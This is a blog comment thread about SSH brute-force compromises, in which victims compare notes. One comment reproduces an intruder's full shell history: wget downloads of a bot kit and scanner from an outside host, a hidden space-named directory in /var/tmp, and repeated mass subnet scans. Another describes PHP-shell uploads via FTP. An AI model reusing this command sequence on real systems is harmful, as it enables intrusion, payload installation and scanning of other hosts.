Comments on: Anatomy of an SSH Brute Force Dictionary Attack

By: piper

piper — Wed, 31 Dec 2008 09:24:48 +0000

Thanks for sharing the information I was actually looking at my SSH logs and decided to do some google searching. I guess that’s one of the problems we faced when sharing a server with other people.

By: F4LL3N

F4LL3N — Mon, 08 Oct 2007 06:24:55 +0000

losers? lol. You sound disgruntled. perhaps you had this same thing happen to you. Every Hacker exploits (in some form or another) somones stupidity. It could be a hole in a program, or as simple as a No password/crackable ssh login. Not to mention people… these “lamers” (lol ok..) dont need root account to get root account. Many kernels are exploitable to gain root ax by running a simple app. so its not only a root users login u will need to worry about. (obviously) U get foolish people like Sadox who have had it happen to them, then claim to be the allknowing hacker master. foolish child. and finally, I come to the conclusion of my book. Please…. do not remove my files from your boxes. Have a pleasent day.

By: Sadox

Sadox — Sun, 22 Jul 2007 22:05:35 +0000

God… guys… thos` are not hackers… are “the biggest lamers”… pff i’m so sorry to hear that u call these hackers…. these are nothing more than some losers from IRC@Undernet… they don’t know a shit about linux they just have scanners made by someone else… they use these scanners and they know only a set of commands… they don’t even know how the scanner works exactly… damn…. anyway try to read this : http://unixcod.org/forum/index.php?topic=12.0 – so u don’t have to worry about these pathetic losers in the future.

By: andrew

andrew — Mon, 18 Jun 2007 15:57:12 +0000

When u see that .. u bet they are some a*sholes exploiting people stupidity. You should never use passwords like root123, 123456, 1q2w3e, abc123 .. etc .. that\\\’s why they get access to your boxes .. user strong passwords like *@Q*ui122 .. and also remove the nologin accounts .. because they can be used by this kids … they connect to your box using ftp and upload a .php file .. then they run http://ip/~user/file.php (PHP Shell Offender) .. and they can upload bots .. open telnet ports (4040,4000,1414 .. etc) ..

By: Zap

Zap — Fri, 17 Mar 2006 04:44:50 +0000

Another set of commands from my servers history – I think these guys have some pre written script

624 PATH=”.”
625 mingetty
626 exit 0
627 w
628 passwd
629 cat /proc/cpui nfo
630 cat /proc/cpuinfo
631 w
632 uname -a
633 cat /etc/issue
634 cd /var/tmp
635 ls -a
636 mkdir ” ”
637 cd ” ”
638 wget belea.idilis.ro/5boti
639 wget belea.idilis.ro/5boti.tgz
640 wget belea.idilis.ro/scanner.tgz
641 tar zxvf 5boti.tgz
642 rm -rf 5boti.tgz
643 last
644 ps -x
645 ps -aux
646 id
647 ls
648 cd .f
649 ls
650 rm -f mech.session
651 sh
652 cd ..
653 ls -a
654 tar zxvf scanner.tgz
655 rm -rf scanner.tgz
656 cd scanner
657 ls
658 w
659 last
660 ./a 71.243
661 w
662 ./a 130.166
663 w
664 ls
665 cat /proc/cpuinfo
666 ./a 80.43
667 ./a 141.213
668 w
669 w
670 ./a 132.178
671 ./a 221.133;./a 80.70;./a 67.70
672 w
673 exit
674 pwd
675 cd jakarta-tomcat-5.0.28/
676 ls
677 cd logs
678 tail -f catalina.out
679 exit
680 w
681 last
682 cd /var/tmp
683 cd .2 ”
684 cd .” ”
685 ls -a
686 cd ” ”
687 ls -a
688 cd scanner
689 ls
690 cat vuln.txt
691 ./a 213.25
692 w
693 ./a 213.255
694 w
695 ./a 213.254
696 w
697 ./a 213.253
698 w
699 ./a 213.7
700 ./a 84.152
701 w
702 ./a 82.200
703 ./a 82.2
704 w
705 ./a 213.55
706 w
707 exit
708 w
709 ps -x
710 kill -9 30261
711 w
712 ps -x
713 cd /var/tmp
714 cd .” ”
715 ls -a
716 cd ” ”
717 ls -a
718 cd scanner
719 ls
720 rm -f 128.21.pscan.22 147.127.pscan.22 171.0.pscan.22 171.1.pscan.22 222.10.pscan.22 222.11.pscan.22 222.12.pscan.22 222.13.pscan.22 222.14.pscan.22
721 ls
722 cat vuln.txt
723 rm -f vuln.txt
724 ./a 24.31
725 w
726 ./a 128.135
727 w
728 ./a 219.10
729 ./a 219.11
730 ./a 84.223
731 ./a 84.224
732 ./a 84.22
733 ./a 137.28
734 ./a 130.58
735 ./a 130.126
736 ./a 130.122
737 ./a 140.128
738 ./a 156.236
739 ./a 150.210
740 ./a 150.217
741 ./a 150.218
742 w
743 exit
744 w
745 cd /var/tmp
746 cd .” ”
747 cd ” ”
748 cd scanner
749 ls
750 rm -f 130.122.pscan.22 150.210.pscan.22 150.218.pscan.22 156.236.pscan.22 219.10.pscan.22 219.11.pscan.22 222.15.pscan.22 23.3.pscan.22 84.224.pscan.22 88.146.pscan.22
751 cat vuln.txt
752 tm -f vuln.txt
753 rm -f vuln.txt
754 ls
755 ./a 201.182
756 ./a 204.52
757 w
758 ./a 24.104
759 w
760 ./a 81.7
761 ./a 81.8
762 w
763 ./a 199.237
764 w
765 exit
766 w
767 cd /var/tmp
768 cd .” ”
769 cd ” ”
770 cd scanner
771 ls
772 rm -f 199.237.pscan.22 201.182.pscan.22 mfu.txt
773 ./a 212.182
774 w
775 ./a 213.114
776 w
777 last
778 ./a 218.12
779 ./a 218.13
780 w
781 ./a 217.23
782 ./a 194.254
783 w
784 cd ..
785 ls -a
786 ftp bama.ua.edu
787 ls
788 ftp bama.ua.edu
789 ls
790 w
791 cd scanner
792 ./a 72.177
793 ./a 72.178
794 w
795 w
796 uname a
797 cat /etc/hosts
798 ./a 60.49
799 w
800 ./a 217.204
801 ./a 207.41
802 ./a 207.42
803 w
804 ./a 63.174
805 w
806 ./a 211.21

By: Daniil

Daniil — Mon, 19 Dec 2005 16:21:41 +0000

Well, thanks a bunch for this. I’ve found your page by looking for vuln.txt and it seems my server was hacked in exactly the same way. Only hacker created a directory ” ” so I didn’t even see the files at first. Thanks for sharing the info. Its good to know I’m not the only one.